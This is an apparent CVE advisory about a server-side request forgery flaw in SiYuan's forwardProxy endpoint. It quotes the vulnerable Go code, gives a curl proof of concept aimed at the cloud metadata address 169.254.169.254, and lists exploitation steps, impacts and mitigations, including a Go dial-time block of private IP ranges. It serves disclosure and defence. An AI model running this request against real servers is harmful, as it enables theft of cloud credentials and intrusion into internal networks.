SiYuan, SSRF, N/A (Critical)

The vulnerability resides in the `/api/network/forwardProxy` endpoint of SiYuan, which allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user‑controlled URL via a JSON payload and performs an HTTP request using the `request.Send()` function. The code only validates the URL format with `url.ParseRequestURI()` but does not restrict the destination IP or hostname. The affected code is found in `/kernel/api/network.go` (lines 153‑317).

This lack of validation enables an attacker to force the server to send requests to internal networks, localhost, or cloud metadata services (e.g., 169.254.169.254). The server then returns the full response body and headers to the attacker, effectively turning the server into an open proxy.

An attacker first authenticates to obtain a valid `siyuan` cookie, then sends a POST request to the endpoint with a `url` field pointing to an internal or metadata resource. The server blindly forwards the request and leaks the response. This SSRF can be used for internal network reconnaissance, stealing cloud IAM credentials, exfiltrating data, and bypassing firewall rules by leveraging the server’s trusted IP.

dailycve form

Platform: SiYuan
Version: All versions
Vulnerability: SSRF via forwardProxy
Severity: Critical
date: Unknown

Prediction: Pending

What Undercode Say:

Analytics

Vulnerable code snippet (network.go lines 153‑317):

    func forwardProxy(c *gin.Context) {
        ret := gulu.Ret.NewResult()
        defer c.JSON(http.StatusOK, ret)
        arg, ok := util.JsonArg(c, ret)
        if !ok {
            return
        }
        destURL := arg["url"].(string)
        // Only validates URL format, not destination
        if _, e := url.ParseRequestURI(destURL); nil != e {
            ret.Code = -1
            ret.Msg = "invalid [url]"
            return
        }
        // HTTP request made to user-controlled URL
        resp, err := request.Send(method, destURL)
        // Full response body returned to user
        bodyData, err := io.ReadAll(resp.Body)
        // ...
        ret.Data = data // Contains full response body
    }

Exploitation PoC using curl:

    curl -X POST http://<TARGET>/api/network/forwardProxy \
      -H "Cookie: siyuan=<AUTH_COOKIE>" \
      -H "Content-Type: application/json" \
      -d '{"url":"http://169.254.169.254/metadata/v1/","method":"GET","headers":[],"payload":"","timeout":7000}'

Exploit

  1. Authenticate and capture a valid `siyuan` cookie.
  2. Send a POST request to `/api/network/forwardProxy` with a JSON body containing the target internal URL (e.g., cloud metadata service, internal server).
  3. The server returns the response body, exposing sensitive data.

Protection from this CVE

  • Implement strict allow‑list validation for URLs (only permit external, trusted domains).
  • Block requests to private IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 169.254.169.254/32).
  • Use a dedicated HTTP client with disabled redirects and restricted network interfaces.
  • Apply the principle of least privilege: limit which users can access the endpoint.
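
The IP-range and dedicated-client mitigations above, sketched as an added example (not SiYuan's code or its fix): a Go HTTP client whose dialer vets the resolved IP at connect time and which does not follow redirects. `errBlocked`, `dialControl` and `newProxyClient` are hypothetical names, and the check goes beyond the listed ranges by also refusing IPv6 loopback and unique-local, all link-local, unspecified and multicast addresses.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"syscall"
	"time"
)

// errBlocked is a hypothetical sentinel error for refused destinations.
var errBlocked = errors.New("destination not permitted")

// dialControl runs after DNS resolution, on the literal IP being connected to,
// so a hostname that resolves to an internal address is refused as well.
func dialControl(_, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip := net.ParseIP(host) // nil for anything that is not a plain IP: fail closed
	if ip == nil || ip.IsLoopback() || ip.IsPrivate() || ip.IsUnspecified() ||
		ip.IsLinkLocalUnicast() || ip.IsMulticast() {
		// IsLinkLocalUnicast covers 169.254.0.0/16, including 169.254.169.254.
		return errBlocked
	}
	return nil
}

// newProxyClient returns a client that never follows redirects and checks
// every connection it opens with dialControl. Transport.Proxy is left nil so
// an environment proxy cannot hide the real destination from the check.
func newProxyClient() *http.Client {
	d := &net.Dialer{Timeout: 5 * time.Second, Control: dialControl}
	return &http.Client{
		Timeout:   7 * time.Second,
		Transport: &http.Transport{DialContext: d.DialContext},
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse // hand 3xx back to the caller unfollowed
		},
	}
}

func main() {
	// Constructed loopback URL; the dial is refused before connect() is called.
	_, err := newProxyClient().Get("http://127.0.0.1:8080/")
	fmt.Println("blocked:", errors.Is(err, errBlocked))
}
```

Checking at dial time rather than on the URL string is what closes the gap left by `url.ParseRequestURI()`: the decision is made on the address the socket will actually connect to.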

Impact

  • Internal network reconnaissance and service discovery.
  • Theft of cloud IAM credentials from metadata services.
  • Data exfiltration from internal systems.
  • Bypass of firewall rules via trusted server origin.

Sources:

Reported By: github.com